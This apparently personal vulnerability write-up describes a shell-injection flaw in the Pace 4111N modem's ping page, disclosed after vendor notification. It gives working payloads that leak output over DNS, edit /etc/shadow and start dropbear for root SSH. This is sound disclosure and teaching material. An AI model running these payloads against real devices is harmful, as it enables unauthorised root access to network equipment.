Pace 4111N Privilege Escalation Vulnerability 2016-11-14

This is probably coming a bit late. I wanted to make sure the vendor and my former ISP (I moved) had ample time to patch this.

Last I recall, the patch had not rolled out. I let them know well over a year ago.

The Pace 4111N is a DSL modem. It runs Linux. It gives you not-quite unlimited access from a password written on a sticker on the unit itself. In my case, it was rented from Sonic.net. I believe that firmware 9.5.1.53.1 is affected, and possibly later versions.

For whatever reason, I wanted more access. I no longer have the modem, just memories and notes on it. So, bare with me.

Perusing the various "utilities" of the web interface ( http://192.168.42.1/ ), I came across the "ping" interface: http://192.168.42.1/xslt?PAGE=C_5_4

Something curious inside me tried the following as the host to ping: $(echo go-beyond.org) . It worked. echo $(localhost) would ping 127.0.0.1, and so forth.

What I found was that I only got output from the ping command, and nothing else. That output was pretty much just limited to whatever IP address I put in, or it tried to resolve.

Anyway, this had me thinking. At one point, I pointed the modem to use 192.168.42.105 as the DNS resolver. That way, I could see the command output as DNS queries, more or less. It turns out, hostnames are pretty picky. I had to use tr and get rid of un-DNSable characters from the output. This might look like $(whoami) and I would see ? A root in tcpdump on my laptop.

At some point, I figured out that /mnt/web/ui/icons/ mapped to http://192.168.42.1/icons/ .

tmpfs to the rescue! $(mount -t tmpfs tmpfs /mnt/web/ui/icons)

And you can verify this over DNS:

$(mount | grep tmpfs | tail -n 1 | tr -d " ")

And look at running processes

$(ps auxf > /mnt/web/ui/icons/tmp.txt) , so I checked http://192.168.42.1/icons/tmp.txt

And it worked!

Now, fuller root with some logging in case it doesn't work.

# Give it our hash: openssl passwd -crypt "password" $(sed -i s/1VbtpZPngOWf2/lobwLmuIgWIHo/ /etc/shadow > /mnt/web/ui/icons/tmp.txt)

And start dropbear... $(dropbear_startup & echo 127.0.0.1; true)

Unfortunately, that seems to break our ping interface. Not sure why. Oh well.

ssh root@192.168.42.1 , your password is password. This seems to last until reboot, but no guarantees.

I believe Pace has fixed this and I bugged Sonic.net many times about rolling out the fix.

To be clear, this is nothing magical. It just gives you more access to your moden if you already have user level access. Might be able to use it in some clever way, but it's mostly relevant for poking around and having fun on your modem. If you have this as a rented modem, your ISP may not want you to do so.

Moral of the story: Don't allow shell injection from your web applications. And ideally, don't run them as root in this case.